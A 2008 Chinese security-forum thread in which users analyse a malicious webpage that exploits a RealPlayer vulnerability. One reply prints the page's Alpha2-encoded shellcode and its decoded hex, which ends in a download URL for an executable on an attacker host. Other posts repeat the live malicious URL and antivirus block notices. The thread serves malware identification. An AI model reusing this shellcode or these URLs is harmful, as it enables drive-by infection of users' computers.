http://ak136.justcctvgan.cn/cctvgan/../just1202/real10.htm

显示全部楼层 · 发表于 2008-12-11 18:19:16

这个如何能看到挂的是什么马.用freshow看不出来.请详细说明一下.

显示全部楼层 · 发表于 2008-12-11 18:21:16

http://bbs.kafan.cn/viewthread.p ... mp%3Bascdesc%3DDESC

显示全部楼层 · 发表于 2008-12-11 19:13:39

不好意思,用freshow真看不出什么?我是初学者,请指教一下.

显示全部楼层 · 发表于 2008-12-11 19:27:28

原帖由 knifed 于 2008-12-11 19:13 发表
不好意思,用freshow真看不出什么?我是初学者,请指教一下.

利用Real漏洞的

Expcode=Expcode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpf";
Expcode=Expcode+"KRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzM";
Expcode=Expcode+"Fv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPr";
Expcode=Expcode+"f5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMT";
Expcode=Expcode+"noeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEle";
Expcode=Expcode+"oWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPf";
Expcode=Expcode+"cVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpP";
Expcode=Expcode+"uVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSQPkvTVWTn0k2KRK2PPkd0pkTn1spnvO0aQfSQQcT4VOqs1sdnrEQhE5OpWp"

复制代码

这些实际上是Alpha2加密

去掉Expcode=Expcode+"和";和引号

然后使用FreShow解密，会得到

\x19\xD9\xD9\xD9\xD9\xD9\xD9\xD9\xD9\x21\xCA\x48\x30\x20\x7B\x51\x22\x52\x62\x10\x62\x52\xD0\xC1\x55\xE9\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0A\x66\xDA\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF\x8F\xB3\x66\x66\x66\x3C\x02\xC7\x56\x66\x66\x66\xED\x26\x6A\xED\xDA\x16\x7A\xCB\xED\x26\x6E\xED\xBE\xED\x15\x5A\xED\x12\x78\x1E\x65\x95\xED\x18\x46\x65\x9D\xED\x28\x72\xDA\x55\x8B\x30\x31\x37\xED\x59\x65\x9D\xED\x94\x0C\x68\x3F\x95\xC0\x12\x6E\x3F\x39\xE5\xA1\x62\x23\x84\xDA\x8F\x3F\x39\x38\xED\xAB\xED\x20\x42\x65\xA5\xB7\x87\x65\xA7\x55\xAF\x00\xED\x6E\xED\x20\x7A\x65\xA5\xDA\xA7\x87\x64\x65\xA7\xED\x66\x65\xA5\xED\x9C\xED\x91\xE5\xA0\x68\xED\xB6\x0C\x62\x3F\x8E\x36\x66\x66\xDA\x66\xE5\xA0\x6B\x34\x30\x99\x31\x9A\x3C\xED\xBE\x0C\x67\x3F\x8E\x5B\x66\x66\x66\xE5\xA0\x0D\xD5\x30\x20\xE6\x58\xE6\x13\x9C\xE6\x50\xE6\x38\xE5\x8A\x46\xED\xBA\x0C\x46\x35\x99\x31\x8A\xA1\x62\x65\x3A\x07\x48\x03\xA1\x22\x65\x62\x1E\x03\x66\x66\x55\xA6\x36\x36\x35\x30\x36\x99\x31\x9A\xED\xBA\x36\x35\x99\x31\x96\x36\x99\x31\x92\x55\xA6\xCA\xE3\xA6\x13\x9F\x37\x34\x30\x35\x99\xB4\x3C\x3F\xCD\x84\x88\x55\xA6\xA5\x8E\x40\x99\x99\x99\x21\x03\x12\x36\x14\x09\x05\x27\x02\x02\x14\x03\x15\x15\x66\x21\x03\x12\x35\x1F\x15\x12\x03\x0B\x22\x0F\x14\x03\x05\x12\x09\x14\x1F\x27\x66\x31\x0F\x08\x23\x1E\x03\x05\x66\x23\x1E\x0F\x12\x32\x0E\x14\x03\x07\x02\x66\x2A\x09\x07\x02\x2A\x0F\x04\x14\x07\x14\x1F\x27\x66\x13\x14\x0A\x0B\x09\x08\x66\x33\x34\x2A\x22\x09\x11\x08\x0A\x09\x07\x02\x32\x09\x20\x0F\x0A\x03\x27\x66\x68\x74\x74\x70\x3A\x2F\x2F\x61\x6B\x34\x37\x2E\x6B\x6B\x6B\x70\x6B\x70\x6B\x2E\x63\x6E\x2F\x61\x76\x61\x73\x74\x2F\x63\x63\x2E\x65\x78\x65\x80

复制代码

再用ESC解密即可得到东西了

显示全部楼层 · 发表于 2008-12-11 19:39:20

明白,谢谢

显示全部楼层 · 发表于 2008-12-11 20:00:17

Web 站点被趋势科技网络安全专家阻止

    此 Web 页面已被确定为“危险的”页面。

可采取的措施:
>
为您自己的安全起见，现在就请关闭此 Web 浏览器窗口并且再不要返回此 Web 站点。
>
如果您仍想查看此被阻止的页面:

1. 启动趋势科技网络安全专家控制台。
2. 单击 Internet 与电子邮件控制。
3. 单击防网络威胁下的设置...链接。
4. 在下一个打开的窗口中单击允许的 Web 站点链接。
5. 复制被阻止的 Web 站点的地址并将其粘贴到该列表。

显示全部楼层 · 发表于 2008-12-11 20:01:04

用Alpha解密软件更省事

显示全部楼层 · 发表于 2008-12-11 21:57:56

调戏一下这个SHELLCODE
不好意思，最近调戏上瘾了

显示全部楼层 · 发表于 2008-12-12 07:49:14

Access to the data has been denied!

Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL: http://ak136.justcctvgan.cn/just1202/real10.htm
Information: Contains recognition pattern of the EXP/RealPlr.CT exploit
Generated by AntiVir WebGuard 8.0.15.0, AVE 8.2.0.45, VDF 7.1.0.224

[已鉴定] http://ak136.justcctvgan.cn/cctvgan/../just1202/real10.htm